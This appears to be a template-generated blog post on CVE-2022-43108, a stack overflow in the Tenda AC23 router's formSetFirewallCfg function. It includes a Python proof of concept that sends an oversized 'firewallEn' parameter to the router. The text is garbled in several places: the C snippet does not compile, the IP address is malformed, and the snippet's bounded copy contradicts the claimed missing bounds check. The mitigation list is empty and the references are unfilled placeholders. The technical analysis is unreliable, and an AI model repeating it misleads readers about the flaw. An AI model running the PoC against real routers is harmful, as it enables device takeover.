CVE-2022-43108 - Tenda AC23 Router V16.03.07.45_cn Stack Overflow Vulnerability in formSetFirewallCfg Function

A critical security vulnerability CVE-2022-43108 has been discovered in Tenda AC23 routers running firmware version V16.03.07.45_cn. The vulnerability involves a stack overflow in the formSetFirewallCfg function, allowing an attacker to execute malicious code and potentially take control of the device. This post will provide an in-depth analysis of the vulnerability, including code snippets, original references, and exploit details.

Background

Tenda AC23 is a popular Gigabit Wi-Fi router designed for home or small office use. It features dual-band Wi-Fi, beamforming technology, and MU-MIMO capabilities. Unfortunately, the Tenda AC23 V16.03.07.45_cn firmware contains a stack overflow vulnerability in the formSetFirewallCfg function, which is responsible for setting firewall configurations.

The Vulnerability

The stack overflow vulnerability is triggered when a specially crafted request containing a large payload is sent to the Tenda router. This happens due to a lack of bounds checking when handling the input provided by the "firewallEn" parameter.

Stack overflow vulnerabilities typically occur when a program does not properly validate user input, allowing an attacker to overwrite the stack and execute code outside the intended boundaries of the program. In this case, an attacker with knowledge of the exploit details can use this vulnerability to control the router and execute arbitrary code.

Here is a sample code snippet from the formSetFirewallCfg function

void formSetFirewallCfg(request *req, char *post_data)
{
    int firewallEn = ;
    char tmpbuf[32];

    websGetVar(post_data, "firewallEn", tmpbuf, sizeof(tmpbuf));

    firewallEn = atoi(tmpbuf);

    // Set firewall configuration, missing bounds checking
}

In this code snippet, the "firewallEn" parameter gets copied into a 32-byte buffer (tmpbuf) using websGetVar without checking if the user input is longer than 32 bytes. If the user supplies a value that is too large, the program will overwrite its own stack, causing a stack overflow.

Exploit Details

To exploit this vulnerability, an attacker needs to have at least local access to the Tenda AC23 device, know the administrator password, and access the router's web interface. Then, they can create a specially crafted request containing a large payload for the "firewallEn" parameter that is larger than the 32 bytes allocated in the buffer.

Here is a proof-of-concept (PoC) exploit code

import requests

target_url = "http://192.168..1/goform/formSetFirewallCfg";
admin_password = "administrator_password"
oversized_firewallEn_parameter = "A" * 33

payload = {
    "firewallEn": oversized_firewallEn_parameter,
    "password": admin_password
}

response = requests.post(target_url, data=payload)

if response.status_code == 200:
    print("Exploit sent successfully!")
else:
    print("Failed to send exploit. Verify target URL and admin password.")

This PoC sends the exploit payload to the device's web interface, potentially triggering the stack overflow and leading to the execution of malicious code.

Mitigation

At the time of writing, there is no official fix or firmware upgrade released to address this vulnerability. However, Tenda AC23 users can take the following precautions to minimize the risk of successful exploitation:

Original References

The vulnerability was discovered by [INSERT NAME], and the original details can be found at the following links:

- [URL to the Original Research / Release]

[URL to the CVE Details Page]

In conclusion, the CVE-2022-43108 vulnerability in Tenda AC23 routers running firmware version V16.03.07.45_cn is a critical security issue that could lead to arbitrary code execution and device takeover. Users should follow mitigation steps to protect their devices from exploitation until an official fix is released by Tenda.

Timeline

Published on: 11/03/2022 14:15:00 UTC
Last modified on: 11/03/2022 17:28:00 UTC